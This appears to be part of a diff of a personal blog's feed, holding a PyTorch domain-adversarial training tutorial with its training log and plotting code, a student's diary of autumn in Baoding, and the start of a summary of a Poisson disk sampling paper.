# Define the loss functions
class_criterion = nn.CrossEntropyLoss()    # cross-entropy for classification, between LabelPredictor's class scores and the true labels
domain_criterion = nn.BCEWithLogitsLoss()  # binary cross-entropy (with logits, i.e. the sigmoid is applied internally) for DomainClassifier's binary domain labels

# Each optimizer uses Adam (optim.Adam), which copes well with the many
# parameters and unstable gradients typical of deep learning.
optimizer_F = optim.Adam(feature_extractor.parameters())
optimizer_C = optim.Adam(label_predictor.parameters())
optimizer_D = optim.Adam(domain_classifier.parameters())

Start Training

DaNN Implementation

The original paper uses a Gradient Reversal Layer, training the Feature Extractor, Label Predictor, and Domain Classifier all at once. In this code, we instead train the Domain Classifier first and then our Feature Extractor (the same idea as training the Discriminator and Generator in a GAN); a sketch of the gradient reversal layer follows below.
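For reference, the gradient reversal layer from the original paper can be written as a custom autograd Function; this is my own sketch of that idea, not part of the homework code:

import torch
from torch.autograd import Function

class GradReverse(Function):
    @staticmethod
    def forward(ctx, x, lamb):
        ctx.lamb = lamb
        return x.view_as(x)  # identity on the forward pass

    @staticmethod
    def backward(ctx, grad_output):
        # Negate (and scale) the gradient on the backward pass.
        return -ctx.lamb * grad_output, None

# The domain classifier would then consume GradReverse.apply(feature, lamb),
# letting one backward pass train all three components simultaneously.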

Reminders

• The lambda weighting the domain-adversarial loss is adaptive in the original paper; you can consult the original work (a sketch of the schedule follows this list). Here lambda is set to 0.1.
• We have no labels for the target data, so you can only evaluate your model by uploading the results to Kaggle :)
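If I recall the original DANN paper correctly, the adaptive schedule ramps lambda from 0 towards 1 as $\lambda_p=\frac{2}{1+\exp(-10p)}-1$, where $p\in[0,1]$ is the training progress; a sketch (treat the constant 10 as an assumption to verify against the paper):

import numpy as np

def adaptive_lamb(epoch, n_epochs, gamma=10.0):
    # Ramp lambda up over training, so the domain loss only kicks in
    # once the extracted features have become meaningful.
    p = epoch / n_epochs
    return 2.0 / (1.0 + np.exp(-gamma * p)) - 1.0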
def train_epoch(source_dataloader, target_dataloader, lamb):
    '''
    Args:
        source_dataloader: dataloader of the source data
        target_dataloader: dataloader of the target data
        lamb: controls the balance between domain adaptation and classification
    '''

    # D loss: loss of the Domain Classifier
    # F loss: loss of the Feature Extractor & Label Predictor
    # running_D_loss accumulates the domain classifier's loss;
    # running_F_loss accumulates the feature extractor / label predictor loss.
    running_D_loss, running_F_loss = 0.0, 0.0
    # total_hit and total_num track classification accuracy on the source domain.
    total_hit, total_num = 0.0, 0.0

    for i, ((source_data, source_label), (target_data, _)) in enumerate(zip(source_dataloader, target_dataloader)):
        # Iterate over source and target batches in lockstep: source_data and
        # source_label are source images and labels, target_data are target images.
        source_data = source_data.cuda()
        source_label = source_label.cuda()
        target_data = target_data.cuda()

        # Mix the source data and target data, or it'll mislead the running params
        # of batch_norm (running mean/var of source and target data are different).
        mixed_data = torch.cat([source_data, target_data], dim=0)
        domain_label = torch.zeros([source_data.shape[0] + target_data.shape[0], 1]).cuda()
        # Set the domain label of source data to 1.
        domain_label[:source_data.shape[0]] = 1

        # Step 1: train the domain classifier.
        # Extract features of the mixed batch; feature.detach() below stops
        # gradients from flowing back into feature_extractor.
        feature = feature_extractor(mixed_data)
        # We don't need to train the feature extractor in step 1,
        # thus we detach the feature to avoid backpropagation into it.
        domain_logits = domain_classifier(feature.detach())
        # Compute the domain classification loss from domain_label and domain_logits.
        loss = domain_criterion(domain_logits, domain_label)
        running_D_loss += loss.item()
        loss.backward()
        optimizer_D.step()

        # Step 2: train the feature extractor and label classifier.
        # class_logits are the label predictor's outputs on the source half.
        class_logits = label_predictor(feature[:source_data.shape[0]])
        # domain_logits are used for domain classification.
        domain_logits = domain_classifier(feature)
        # loss = classification cross-entropy - lamb * domain binary cross-entropy.
        # The subtraction plays the same role as the generator loss against the
        # discriminator in a GAN: the classification loss on the source domain,
        # class_criterion(class_logits, source_label), minus the domain loss,
        # domain_criterion(domain_logits, domain_label), gives the adversarial effect.
        loss = class_criterion(class_logits, source_label) - lamb * domain_criterion(domain_logits, domain_label)
        running_F_loss += loss.item()
        loss.backward()
        # Update feature_extractor and label_predictor.
        optimizer_F.step()
        optimizer_C.step()

        # Zero all gradients after each batch.
        optimizer_D.zero_grad()
        optimizer_F.zero_grad()
        optimizer_C.zero_grad()

        # Track the source-domain classification accuracy.
        total_hit += torch.sum(torch.argmax(class_logits, dim=1) == source_label).item()
        total_num += source_data.shape[0]
        print(i, end='\r')

    return running_D_loss / (i+1), running_F_loss / (i+1), total_hit / total_num

# Train 200 epochs; after each epoch, save the model weights and
# print the training losses and accuracy.
for epoch in range(200):

    train_D_loss, train_F_loss, train_acc = train_epoch(source_dataloader, target_dataloader, lamb=0.1)

    torch.save(feature_extractor.state_dict(), f'extractor_model.bin')
    torch.save(label_predictor.state_dict(), f'predictor_model.bin')

    print('epoch {:>3d}: train D loss: {:6.4f}, train F loss: {:6.4f}, acc {:6.4f}'.format(epoch, train_D_loss, train_F_loss, train_acc))
    epoch   0: train D loss: 0.6715, train F loss: 1.8669, acc 0.2928
    epoch 1: train D loss: 0.6264, train F loss: 1.5707, acc 0.4166
    epoch 2: train D loss: 0.5412, train F loss: 1.4445, acc 0.4794
    epoch 3: train D loss: 0.5390, train F loss: 1.3692, acc 0.4992
    epoch 4: train D loss: 0.5540, train F loss: 1.3243, acc 0.5140
    epoch 5: train D loss: 0.5439, train F loss: 1.2459, acc 0.5480
    epoch 6: train D loss: 0.5538, train F loss: 1.2264, acc 0.5482
    epoch 7: train D loss: 0.5369, train F loss: 1.1544, acc 0.5800
    epoch 8: train D loss: 0.5194, train F loss: 1.1397, acc 0.5838
    epoch 9: train D loss: 0.5368, train F loss: 1.0921, acc 0.5950
    epoch 10: train D loss: 0.5298, train F loss: 1.0657, acc 0.6070
    epoch 11: train D loss: 0.5146, train F loss: 1.0287, acc 0.6186
    epoch 12: train D loss: 0.5331, train F loss: 0.9963, acc 0.6338
    epoch 13: train D loss: 0.5301, train F loss: 0.9842, acc 0.6412
    epoch 14: train D loss: 0.5383, train F loss: 0.9447, acc 0.6488
    epoch 15: train D loss: 0.5252, train F loss: 0.9263, acc 0.6560
    epoch 16: train D loss: 0.5268, train F loss: 0.8820, acc 0.6748
    epoch 17: train D loss: 0.5110, train F loss: 0.8503, acc 0.6848
    epoch 18: train D loss: 0.4955, train F loss: 0.8061, acc 0.7070
    epoch 19: train D loss: 0.5145, train F loss: 0.7806, acc 0.7096
    epoch 20: train D loss: 0.4760, train F loss: 0.7562, acc 0.7194
    epoch 21: train D loss: 0.4721, train F loss: 0.7087, acc 0.7350
    epoch 22: train D loss: 0.4876, train F loss: 0.6906, acc 0.7458
    epoch 23: train D loss: 0.4821, train F loss: 0.6563, acc 0.7580
    epoch 24: train D loss: 0.4547, train F loss: 0.6063, acc 0.7780
    epoch 25: train D loss: 0.4642, train F loss: 0.6035, acc 0.7788
    epoch 26: train D loss: 0.4758, train F loss: 0.5768, acc 0.7826
    epoch 27: train D loss: 0.4539, train F loss: 0.5465, acc 0.7956
    epoch 28: train D loss: 0.4447, train F loss: 0.4864, acc 0.8144
    epoch 29: train D loss: 0.4610, train F loss: 0.5191, acc 0.8064
    epoch 30: train D loss: 0.4341, train F loss: 0.4504, acc 0.8372
    epoch 31: train D loss: 0.4363, train F loss: 0.4291, acc 0.8380
    epoch 32: train D loss: 0.4493, train F loss: 0.4082, acc 0.8508
    epoch 33: train D loss: 0.4308, train F loss: 0.3958, acc 0.8506
    epoch 34: train D loss: 0.4318, train F loss: 0.3513, acc 0.8658
    epoch 35: train D loss: 0.4356, train F loss: 0.3378, acc 0.8708
    epoch 36: train D loss: 0.3975, train F loss: 0.3467, acc 0.8684
    epoch 37: train D loss: 0.4213, train F loss: 0.3099, acc 0.8794
    epoch 38: train D loss: 0.3939, train F loss: 0.2874, acc 0.8900
    epoch 39: train D loss: 0.4279, train F loss: 0.3113, acc 0.8826
    epoch 40: train D loss: 0.4045, train F loss: 0.2726, acc 0.8916
    epoch 41: train D loss: 0.4015, train F loss: 0.2682, acc 0.8974
    epoch 42: train D loss: 0.3976, train F loss: 0.2458, acc 0.9062
    epoch 43: train D loss: 0.4092, train F loss: 0.2502, acc 0.9026
    epoch 44: train D loss: 0.3983, train F loss: 0.2196, acc 0.9120
    epoch 45: train D loss: 0.3920, train F loss: 0.2242, acc 0.9158
    epoch 46: train D loss: 0.4072, train F loss: 0.2050, acc 0.9168
    epoch 47: train D loss: 0.3964, train F loss: 0.1852, acc 0.9272
    epoch 48: train D loss: 0.4001, train F loss: 0.2130, acc 0.9172
    epoch 49: train D loss: 0.3910, train F loss: 0.1914, acc 0.9248
    epoch 50: train D loss: 0.3924, train F loss: 0.1978, acc 0.9228
    epoch 51: train D loss: 0.3916, train F loss: 0.1758, acc 0.9262
    epoch 52: train D loss: 0.3843, train F loss: 0.1651, acc 0.9314
    epoch 53: train D loss: 0.3681, train F loss: 0.1555, acc 0.9352
    epoch 54: train D loss: 0.3960, train F loss: 0.1557, acc 0.9320
    epoch 55: train D loss: 0.3765, train F loss: 0.1543, acc 0.9356
    epoch 56: train D loss: 0.3789, train F loss: 0.1420, acc 0.9406
    epoch 57: train D loss: 0.3878, train F loss: 0.1423, acc 0.9418
    epoch 58: train D loss: 0.3799, train F loss: 0.1477, acc 0.9396
    epoch 59: train D loss: 0.3710, train F loss: 0.1316, acc 0.9450
    epoch 60: train D loss: 0.3815, train F loss: 0.1294, acc 0.9456
    epoch 61: train D loss: 0.3789, train F loss: 0.1300, acc 0.9466
    epoch 62: train D loss: 0.3912, train F loss: 0.1273, acc 0.9472
    epoch 63: train D loss: 0.4002, train F loss: 0.1206, acc 0.9492
    epoch 64: train D loss: 0.3895, train F loss: 0.1332, acc 0.9432
    epoch 65: train D loss: 0.3853, train F loss: 0.1152, acc 0.9518
    epoch 66: train D loss: 0.3878, train F loss: 0.1420, acc 0.9424
    epoch 67: train D loss: 0.3823, train F loss: 0.1158, acc 0.9478
    epoch 68: train D loss: 0.3798, train F loss: 0.1131, acc 0.9514
    epoch 69: train D loss: 0.3736, train F loss: 0.1022, acc 0.9508
    epoch 70: train D loss: 0.3749, train F loss: 0.1215, acc 0.9498
    epoch 71: train D loss: 0.3752, train F loss: 0.0972, acc 0.9572
    epoch 72: train D loss: 0.3745, train F loss: 0.1077, acc 0.9558
    epoch 73: train D loss: 0.3694, train F loss: 0.1041, acc 0.9562
    epoch 74: train D loss: 0.3717, train F loss: 0.0976, acc 0.9534
    epoch 75: train D loss: 0.3718, train F loss: 0.1092, acc 0.9552
    epoch 76: train D loss: 0.3717, train F loss: 0.0744, acc 0.9648
    epoch 77: train D loss: 0.3794, train F loss: 0.0861, acc 0.9590
    epoch 78: train D loss: 0.3652, train F loss: 0.1077, acc 0.9586
    epoch 79: train D loss: 0.3774, train F loss: 0.0617, acc 0.9674
    epoch 80: train D loss: 0.3712, train F loss: 0.0974, acc 0.9582
    epoch 81: train D loss: 0.3725, train F loss: 0.1011, acc 0.9546
    epoch 82: train D loss: 0.3812, train F loss: 0.0931, acc 0.9596
    epoch 83: train D loss: 0.3720, train F loss: 0.0634, acc 0.9668
    epoch 84: train D loss: 0.3752, train F loss: 0.0738, acc 0.9666
    epoch 85: train D loss: 0.3851, train F loss: 0.1143, acc 0.9536
    epoch 86: train D loss: 0.3821, train F loss: 0.0813, acc 0.9618
    epoch 87: train D loss: 0.3911, train F loss: 0.0735, acc 0.9648
    epoch 88: train D loss: 0.3837, train F loss: 0.0832, acc 0.9604
    epoch 89: train D loss: 0.3884, train F loss: 0.0757, acc 0.9624
    epoch 90: train D loss: 0.3728, train F loss: 0.0761, acc 0.9640
    epoch 91: train D loss: 0.3969, train F loss: 0.0718, acc 0.9632
    epoch 92: train D loss: 0.3646, train F loss: 0.0668, acc 0.9632
    epoch 93: train D loss: 0.3808, train F loss: 0.0756, acc 0.9662
    epoch 94: train D loss: 0.3650, train F loss: 0.0818, acc 0.9628
    epoch 95: train D loss: 0.3781, train F loss: 0.0610, acc 0.9682
    epoch 96: train D loss: 0.3837, train F loss: 0.0587, acc 0.9684
    epoch 97: train D loss: 0.3809, train F loss: 0.0591, acc 0.9680
    epoch 98: train D loss: 0.3714, train F loss: 0.0626, acc 0.9670
    epoch 99: train D loss: 0.3909, train F loss: 0.0753, acc 0.9632
    epoch 100: train D loss: 0.3641, train F loss: 0.0607, acc 0.9696
    epoch 101: train D loss: 0.3730, train F loss: 0.0853, acc 0.9612
    epoch 102: train D loss: 0.3746, train F loss: 0.0511, acc 0.9706
    epoch 103: train D loss: 0.3831, train F loss: 0.0493, acc 0.9700
    epoch 104: train D loss: 0.3882, train F loss: 0.0751, acc 0.9622
    epoch 105: train D loss: 0.3777, train F loss: 0.0508, acc 0.9726
    epoch 106: train D loss: 0.3702, train F loss: 0.0462, acc 0.9732
    epoch 107: train D loss: 0.3694, train F loss: 0.0542, acc 0.9734
    epoch 108: train D loss: 0.3700, train F loss: 0.0520, acc 0.9712
    epoch 109: train D loss: 0.3596, train F loss: 0.0439, acc 0.9738
    epoch 110: train D loss: 0.3681, train F loss: 0.0544, acc 0.9688
    epoch 111: train D loss: 0.3840, train F loss: 0.0592, acc 0.9674
    epoch 112: train D loss: 0.3770, train F loss: 0.0624, acc 0.9682
    epoch 113: train D loss: 0.3644, train F loss: 0.0531, acc 0.9720
    epoch 114: train D loss: 0.3787, train F loss: 0.0566, acc 0.9712
    epoch 115: train D loss: 0.3720, train F loss: 0.0429, acc 0.9746
    epoch 116: train D loss: 0.3768, train F loss: 0.0489, acc 0.9732
    epoch 117: train D loss: 0.3765, train F loss: 0.0412, acc 0.9748
    epoch 118: train D loss: 0.3820, train F loss: 0.0450, acc 0.9724
    epoch 119: train D loss: 0.3735, train F loss: 0.0386, acc 0.9768
    epoch 120: train D loss: 0.3774, train F loss: 0.0436, acc 0.9736
    epoch 121: train D loss: 0.3816, train F loss: 0.0491, acc 0.9708
    epoch 122: train D loss: 0.3717, train F loss: 0.0587, acc 0.9686
    epoch 123: train D loss: 0.3802, train F loss: 0.0538, acc 0.9714
    epoch 124: train D loss: 0.3878, train F loss: 0.0432, acc 0.9762
    epoch 125: train D loss: 0.3785, train F loss: 0.0453, acc 0.9746
    epoch 126: train D loss: 0.3749, train F loss: 0.0423, acc 0.9774
    epoch 127: train D loss: 0.3925, train F loss: 0.0328, acc 0.9766
    epoch 128: train D loss: 0.3874, train F loss: 0.0546, acc 0.9682
    epoch 129: train D loss: 0.3843, train F loss: 0.0482, acc 0.9712
    epoch 130: train D loss: 0.3698, train F loss: 0.0500, acc 0.9736
    epoch 131: train D loss: 0.3752, train F loss: 0.0368, acc 0.9762
    epoch 132: train D loss: 0.3818, train F loss: 0.0303, acc 0.9784
    epoch 133: train D loss: 0.3838, train F loss: 0.0490, acc 0.9722
    epoch 134: train D loss: 0.3744, train F loss: 0.0332, acc 0.9792
    epoch 135: train D loss: 0.3743, train F loss: 0.0311, acc 0.9786
    epoch 136: train D loss: 0.3838, train F loss: 0.0419, acc 0.9728
    epoch 137: train D loss: 0.3951, train F loss: 0.0352, acc 0.9760
    epoch 138: train D loss: 0.3878, train F loss: 0.0439, acc 0.9732
    epoch 139: train D loss: 0.3879, train F loss: 0.0419, acc 0.9736
    epoch 140: train D loss: 0.3871, train F loss: 0.0355, acc 0.9758
    epoch 141: train D loss: 0.3819, train F loss: 0.0392, acc 0.9746
    epoch 142: train D loss: 0.3905, train F loss: 0.0578, acc 0.9722
    epoch 143: train D loss: 0.3816, train F loss: 0.0350, acc 0.9758
    epoch 144: train D loss: 0.3899, train F loss: 0.0175, acc 0.9822
    epoch 145: train D loss: 0.4025, train F loss: 0.0469, acc 0.9748
    epoch 146: train D loss: 0.3715, train F loss: 0.0345, acc 0.9748
    epoch 147: train D loss: 0.3841, train F loss: 0.0375, acc 0.9744
    epoch 148: train D loss: 0.3833, train F loss: 0.0310, acc 0.9802
    epoch 149: train D loss: 0.3805, train F loss: 0.0263, acc 0.9764
    epoch 150: train D loss: 0.3763, train F loss: 0.0352, acc 0.9760
    epoch 151: train D loss: 0.3861, train F loss: 0.0330, acc 0.9778
    epoch 152: train D loss: 0.3844, train F loss: 0.0340, acc 0.9764
    epoch 153: train D loss: 0.3902, train F loss: 0.0311, acc 0.9764
    epoch 154: train D loss: 0.3782, train F loss: 0.0387, acc 0.9760
    epoch 155: train D loss: 0.3950, train F loss: 0.0180, acc 0.9808
    epoch 156: train D loss: 0.4017, train F loss: 0.0205, acc 0.9808
    epoch 157: train D loss: 0.3952, train F loss: 0.0484, acc 0.9734
    epoch 158: train D loss: 0.3885, train F loss: 0.0346, acc 0.9776
    epoch 159: train D loss: 0.3916, train F loss: 0.0202, acc 0.9812
    epoch 160: train D loss: 0.3980, train F loss: 0.0306, acc 0.9774
    epoch 161: train D loss: 0.3897, train F loss: 0.0306, acc 0.9800
    epoch 162: train D loss: 0.3909, train F loss: 0.0164, acc 0.9816
    epoch 163: train D loss: 0.3911, train F loss: 0.0273, acc 0.9806
    epoch 164: train D loss: 0.3737, train F loss: 0.0133, acc 0.9830
    epoch 165: train D loss: 0.4064, train F loss: 0.0520, acc 0.9706
    epoch 166: train D loss: 0.3951, train F loss: 0.0242, acc 0.9810
    epoch 167: train D loss: 0.3865, train F loss: 0.0287, acc 0.9810
    epoch 168: train D loss: 0.3921, train F loss: 0.0141, acc 0.9814
    epoch 169: train D loss: 0.3862, train F loss: 0.0130, acc 0.9836
    epoch 170: train D loss: 0.4018, train F loss: 0.0273, acc 0.9764
    epoch 171: train D loss: 0.4053, train F loss: 0.0254, acc 0.9774
    epoch 172: train D loss: 0.4040, train F loss: 0.0169, acc 0.9810
    epoch 173: train D loss: 0.3935, train F loss: 0.0463, acc 0.9734
    epoch 174: train D loss: 0.3991, train F loss: 0.0199, acc 0.9804
    epoch 175: train D loss: 0.3919, train F loss: 0.0275, acc 0.9800
    epoch 176: train D loss: 0.4021, train F loss: 0.0315, acc 0.9780
    epoch 177: train D loss: 0.3856, train F loss: 0.0289, acc 0.9796
    epoch 178: train D loss: 0.3880, train F loss: 0.0171, acc 0.9812
    epoch 179: train D loss: 0.3874, train F loss: 0.0200, acc 0.9824
    epoch 180: train D loss: 0.3974, train F loss: 0.0243, acc 0.9826
    epoch 181: train D loss: 0.3981, train F loss: 0.0191, acc 0.9812
    epoch 182: train D loss: 0.4048, train F loss: 0.0159, acc 0.9822
    epoch 183: train D loss: 0.3929, train F loss: 0.0212, acc 0.9796
    epoch 184: train D loss: 0.3944, train F loss: 0.0130, acc 0.9822
    epoch 185: train D loss: 0.3895, train F loss: 0.0402, acc 0.9752
    epoch 186: train D loss: 0.3849, train F loss: 0.0136, acc 0.9826
    epoch 187: train D loss: 0.3791, train F loss: 0.0222, acc 0.9814
    epoch 188: train D loss: 0.3990, train F loss: 0.0190, acc 0.9812
    epoch 189: train D loss: 0.3964, train F loss: 0.0317, acc 0.9794
    epoch 190: train D loss: 0.3935, train F loss: 0.0385, acc 0.9788
    epoch 191: train D loss: 0.3914, train F loss: 0.0218, acc 0.9812
    epoch 192: train D loss: 0.3764, train F loss: 0.0212, acc 0.9822
    epoch 193: train D loss: 0.3782, train F loss: 0.0193, acc 0.9836
    epoch 194: train D loss: 0.3787, train F loss: 0.0111, acc 0.9832
    epoch 195: train D loss: 0.4000, train F loss: 0.0239, acc 0.9808
    epoch 196: train D loss: 0.3830, train F loss: 0.0201, acc 0.9836
    epoch 197: train D loss: 0.4085, train F loss: 0.0230, acc 0.9802
    epoch 198: train D loss: 0.3908, train F loss: 0.0197, acc 0.9802
    epoch 199: train D loss: 0.3981, train F loss: 0.0170, acc 0.9820

Plot the curves:

import re
import matplotlib.pyplot as plt

# The training log as a string
data = """
epoch 0: train D loss: 0.6715, train F loss: 1.8669, acc 0.2928
epoch 1: train D loss: 0.6264, train F loss: 1.5707, acc 0.4166
epoch 2: train D loss: 0.5412, train F loss: 1.4445, acc 0.4794
epoch 3: train D loss: 0.5390, train F loss: 1.3692, acc 0.4992
...
"""

# Extract the numbers with a regular expression
pattern = r"epoch\s+(\d+): train D loss: ([\d.]+), train F loss: ([\d.]+), acc ([\d.]+)"
matches = re.findall(pattern, data)

# Convert to numeric lists
epochs = []
d_losses = []
f_losses = []
accuracies = []

for match in matches:
    epoch, d_loss, f_loss, acc = map(float, match)
    epochs.append(int(epoch))
    d_losses.append(d_loss)
    f_losses.append(f_loss)
    accuracies.append(acc)

# Plot
plt.figure(figsize=(10, 6))

# D loss and F loss
plt.subplot(2, 1, 1)
plt.plot(epochs, d_losses, label='D Loss', color='blue')
plt.plot(epochs, f_losses, label='F Loss', color='orange')
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.title('Train Losses Over Epochs')
plt.legend()

# Accuracy
plt.subplot(2, 1, 2)
plt.plot(epochs, accuracies, label='Accuracy', color='green')
plt.xlabel('Epoch')
plt.ylabel('Accuracy')
plt.title('Accuracy Over Epochs')
plt.legend()

plt.tight_layout()
plt.show()

    png

Inference

We use pandas to generate the csv file.

By the way, a model trained for 200 epochs may still be unstable; you can train for more epochs for more stable performance.

import numpy as np
import pandas as pd

# Initialize and set the models to evaluation mode
result = []
label_predictor.eval()
feature_extractor.eval()

# Loop over the test data and predict
for i, (test_data, _) in enumerate(test_dataloader):
    test_data = test_data.cuda()

    class_logits = label_predictor(feature_extractor(test_data))

    x = torch.argmax(class_logits, dim=1).cpu().detach().numpy()
    result.append(x)

result = np.concatenate(result)

# Generate your submission:
# concatenate the predictions into a dataframe
df = pd.DataFrame({'id': np.arange(0, len(result)), 'label': result})
df.to_csv('DaNN_submission.csv', index=False)

Visualization

We use a t-SNE plot to observe the distribution of the extracted features.

    import numpy as np
    import matplotlib.pyplot as plt
    from sklearn import manifold
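
# A minimal sketch of the t-SNE visualization (my own illustration, not the
# original homework code); it assumes feature_extractor, test_dataloader and
# the predictions `result` defined in the sections above.
feats = []
feature_extractor.eval()
with torch.no_grad():
    for test_data, _ in test_dataloader:
        feats.append(feature_extractor(test_data.cuda()).cpu().numpy())
feats = np.concatenate(feats)

tsne = manifold.TSNE(n_components=2, init='pca', random_state=0)
emb = tsne.fit_transform(feats)

plt.figure(figsize=(8, 6))
plt.scatter(emb[:, 0], emb[:, 1], s=2, c=result, cmap='tab10')  # color by predicted label
plt.title('t-SNE of the extracted features')
plt.show()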
    ]]>
    @@ -4148,7 +4148,7 @@ /posts/Diary-5-%E6%9B%B4%E5%AF%92%E9%A3%8E%E4%B8%8E%E6%9B%B4%E9%9B%BE%E9%9C%BE/ - 前言

+ Foreword

jpg

The plane trees and the ginkgoes

The few ginkgo trees next to the plane trees stubbornly refuse to turn yellow.


Baoding weather report:

# y-axis data (temperatures and PM values)
y1 = [7, 7, 8, 8, 5, 7, 4, -2, 0, 3, -5, -4, -7]  # daily low
y2 = [22, 25, 25, 24, 17, 18, 16, 12, 12, 15, 9, 6, 7]  # daily high
y3 = [227, 237, 279, 265, 51, 71, 40, 59, 67, 85, 18, 23, 52]  # daily PM value

png

Probably the two weeks with the biggest temperature swings of the year.


This post adds a new HTML effect. Fantastic!

Main Text

    10.30

Probably because the heating is being fired up, the smog remains very heavy.

    10.31

Good news, everyone! It's a fairyland out there!

    jpg

Blinded

Waking up early in the morning to such a "thriving" scene!

jpg

A Hebei specialty

I'd say this level of smog is beyond what Photoshop's dehaze can handle.

[Friendly reminder] Hello, students: the Baoding Meteorological Observatory has issued a red alert for dense fog, and a level-3 emergency response for a major meteorological disaster (dense fog) was activated at 19:00 on October 31. Please forward this to every class to remind students: strengthen your safety awareness, travel with caution, and if you do go out, obey the traffic rules and stay safe.

    11.1

Group meeting time. With the new first-years arriving, the advisor had the third-year seniors report their progress first. One senior spent nearly two hours lecturing on convolutional neural networks; I was dying of sleepiness. And honestly his work felt pretty thin, emmmm: just dilated convolutions plugged into CycleGAN, the results didn't look great either... and no comparison experiments.

Calling the senior a big fraud, are we
LOL
Thin indeed
Still better than mine though

    11.2

     

Brother Fan has gotten hooked on the game 《完蛋!我被美女包围了!》 and spent the whole morning playing instead of going to the lab. Then the dorm inspectors, finding the door unlocked, walked straight in and confiscated the electric kettle without a word; congratulations on n days without foot soaks. Plugging the kettle into the air conditioner's outlet poses no electrical-safety problem whatsoever, does it? Unable to accept this seizure of students' property, we proceeded to a seminar on the finer points of Fuzhou-Minnan swearing.

So mad
Send him a pile of choice Fuzhou dialect
赛尼内
是撒女内
That's a Fuzhou-Minnan hybrid you've got there
Hahaha
Heard it from my roommate before
And one more 赛林北 for the inspector

Seminar adjourned. Then we simply bought a new kettle.

    11.3

Good news, everyone! The smog is over!

The smog is gone, and a sharp cooldown is on the way; presumably the cold front blew the smog away.

jpg

Not as yellow as this time last year

The photo shows the ginkgoes still carrying a bit of green, but once the cold air arrived they turned fully golden, drawing crowds of students to take photos under the trees.

    11.5

Good news, everyone! It finally rained in Baoding!

It even rained in the morning. Having long since stopped carrying an umbrella in my backpack, I realized I'd left mine at the lab, so I bought another at the corner store.


jpg

Water pump

Probably afraid that students would mess around on the frozen lake and cause an accident, Hebei University has started draining the little pond in front of the library; the cute ducklings will have to find a new home.


    jpg

The paint is peeling!

Evening stroll time. Tired of Donghu Park, let's walk the Juli Bridge instead.

jpg

"China Baoding" on the bridge, farmland beneath it

jpg

Dongfeng Road

Dongfeng Road runs from Lekai Street in the west to Juxian Street in the east, 12.3 km in total. From west to east it strings together city landmarks such as Baoding's "eight great factories", the old town, and the high-speed rail station, recording "old Baoding", carrying "new Baoding", and heralding "future Baoding". It is Baoding's "axis of urban culture" and its "avenue for displaying the city's image".
The renovated road now has a safe, smooth slow-traffic system, neat and orderly building facades, beautifully greened streets, efficient and convenient parking, and practical, good-looking municipal facilities, making it a shining calling card for Baoding's push to build a modern city of quality living and show off its "new look".

Baoding's roads run dead straight; Qiyi Road and Dongfeng Road span the entire city.

jpg

No way up onto the road, so back the way I came

I had meant to walk to the toll station for a look, but couldn't find a good photo spot, so I gave up.

jpg

Route K3

Tired of walking, I took the bus back to campus. Baoding has far too few buses; I waited nearly half an hour.

    11.6

Good news, everyone! The daily low has dropped below freezing!

Baoding's low has gone below zero, while Xiamen's high hit 31 °C!

Dying of heat here
Below zero here
31 degrees today
-2

Why are there still flies at this time of year?! Several are buzzing around the lab; I suppose they all came indoors for the warmth.


The nap bunk has become irresistibly cozy; I don't want to get up at all.


Beijing's heating is on, while Baoding's probably still starts on 11.15? It's bearable, really: apart from riding the e-bike at night being a bit cold, indoors stays within an acceptable range.

Heating's really on
20 degrees indoors
The Beijing lords enjoy it first
Envious of Beijing ✌️
Hebei folks freeze
And it's floor heating too ✌️

    11.7

After nearly a month of debugging, it's time to feed the generated data into the alchemy furnace again. I need 10000 images in total, but the computer crashes and reboots after every 1000-odd generated, and each reboot takes nearly 10 minutes. I'm angry enough to laugh.

    11.8

The group meeting knocked me out again... The advisor says second-years must hurry up: grad school is about to pass its halfway mark. But the experiments still aren't working. Curses!

    11.9

The experiments aren't going well, and I feel like slacking off again.


The air today is wonderful. Five stars!

jpg

Air this good would be wasted without a walk

Ducks on Donghu Lake.

    11.10

    jpg

Halfway

The semester is nearly half over!


    jpg

Frosted leaves redder than February flowers

The trees on campus are red, yellow, and green all at once.


The weekend is coming again! My past birthdays were all so plain that I rarely bothered celebrating:

• In '15 I went with Mom, Dad, Grandpa, and Grandma for crab hotpot near Chating.

• '16: I remember nothing at all.

• '17: the birthday fell during monthly exams, biology and English, and I bombed both.

• '18: the college held its welcome party the evening before, so I just stayed up to midnight and called that a celebration.

• '19: went with roommates to the run-down street by the west gate for street food, then picked up a cake at Huafeng Heshi.

• '20: again, nothing I can remember.

• '21: I was grinding for the grad-school entrance exam; as a reward I skipped the morning math paper and had braised chicken with Xiaomihu and Xiaoxiaoguai in the evening.

• '22: that day we happened to be spared the COVID test, and I spent it in the lab tinkering with Unity.


With my 24th birthday approaching, I suddenly felt like shaking things up.

My roommates wanted to visit a job fair in Xiong'an, so I made a plan: after touring with them I would hop on a train at Baiyangdian Station straight to Shijiazhuang, to taste the freedom of traveling alone.

See you next week
Well well
Running off to Shijiazhuang for the weekend, eh
To spend a birthday
Nice, nice

jpg

I've put up with you long enough, cute little flies!

Fly paper has been laid in ambush around the lab. See you next week, Room 324!

    11.11-11.12

Accompanying my roommates to Xiong'an
Then off to Shijiazhuang in the afternoon
Whoa
Busy schedule

Happy weekend!

Back from Shijiazhuang, and keeping our earlier promise, we went to 未来石 to demolish some hotpot.

    jpg

Hotpot

I'm convinced hotpot can never taste bad, and I especially love this place's self-serve desserts.

jpg

Claw machine

After dinner we hit the claw machines: 50 yuan and I caught absolutely nothing, and we ended up jamming the machine...

    ]]>
    @@ -4175,7 +4175,7 @@ /posts/Paper-Fast%20Poisson%20Disk%20Sampling%20in%20Arbitrary%20Dimensions/ - 资源

+ Resources

Original paper

    Abstract

In many applications of graphics, particularly rendering, generating samples from a blue-noise distribution is important. However, existing efficient techniques do not easily generalize beyond two dimensions. Here I demonstrate a simple modification to dart throwing that permits generation of Poisson disk samples in $O(N)$ time, easily implemented in arbitrary dimension.

    1 Introduction

In this sketch I present a new algorithm, easily implemented in arbitrary dimension, that is guaranteed to take $O(N)$ time to generate $N$ Poisson disk samples.

    2 The Algorithm

The algorithm takes as input the extent of the sample domain in $\mathbf R^n$, the minimum distance $r$ between samples, and a constant $k$ as the limit of candidates to try before rejection (typically $k=30$).

Step 0: Initialize an $n$-dimensional background grid for storing samples and accelerating spatial searches. We pick the cell size to be bounded by $r/\sqrt n$, so that each grid cell contains at most one sample; the grid can then be implemented as a simple array of integers, where the default $-1$ indicates no sample and a non-negative integer gives the index of the sample located in that cell.

Step 1: Select the initial sample, $x_0$, uniformly at random from the domain. Insert it into the background grid, and initialize the "active list" (an array of sample indices) with this index (zero).

